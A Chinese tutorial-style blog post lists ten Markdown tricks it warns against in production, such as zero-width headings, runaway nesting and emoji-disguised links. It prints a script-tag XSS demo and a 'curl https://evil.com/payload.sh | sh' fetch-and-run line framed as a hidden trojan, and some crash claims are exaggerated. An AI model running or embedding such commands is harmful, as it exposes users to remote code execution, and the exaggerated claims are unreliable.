邪修 Markdown 10 连击|零宽空格、负缩进、外链炸弹

编程狮(w3cschool.cn) 2025-08-08 16:49:19 浏览数 (165)
反馈

邪修 Markdown ,10 段“千万别上生产”的黑魔法写法
——仅供技术猎奇、博客炫技,切勿写进正式文档!

⚠️ 每条都可能:渲染崩、语义错、阅读器罢工、同事提刀

面试 OK,项目敢用就等死!

1️⃣ 一行毁灭标题

# <!-- html -->
<script>alert('邪修')</script>

<script& 塞标题,部分渲染器直接 XSS。

2️⃣ 零宽空格隐形标题

# ​零宽空格标题

肉眼看不见,目录生成器原地崩溃。

3️⃣ 负缩进列表黑洞

-     超大缩进
  -     再超大
    -     无限套娃

某些解析器生成 100 层 <ul&,浏览器卡爆。

4️⃣ 表格无限列

| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | ... | 100 |
|---|---|---|---|---|---|---|---|---|----|-----|-----|

一行 100 列,渲染器直接 OOM。

5️⃣ 图片外链炸弹

![炸弹](https://atts.w3cschool.cn/attachments/articles/2025-08-08/1-3945.png)

加载 1 GB 图片,页面秒崩。

6️⃣ 脚注循环引用

正文[^1]  
[^1]: 正文[^1]

脚注指向自己,渲染器栈溢出。

7️⃣ 代码块隐藏木马

```bash
curl https://evil.com/payload.sh | sh
> 复制即执行,安全审计原地退役。


---


### 8️⃣ Emoji 伪装外链
```markdown
点击👉[😊](https://www.w3cschool.cn)

看似笑脸,实为编程狮官网;甚至有可能为钓鱼链接。

9️⃣ 无序列表嵌套序号

- 1
  - 2
    - 3

逻辑混乱,目录生成器崩溃。

🔟 注释炸弹

<!-- 这是一段注释,但渲染器会忽略 -->

邪修口诀

“语法当迷宫,渲染当炸弹;

语义全不要,Markdown 哭泣。”

PS

想要正经的学习 MarkDown ,从编程狮的《Markdown 入门课程》开始!

0 人点赞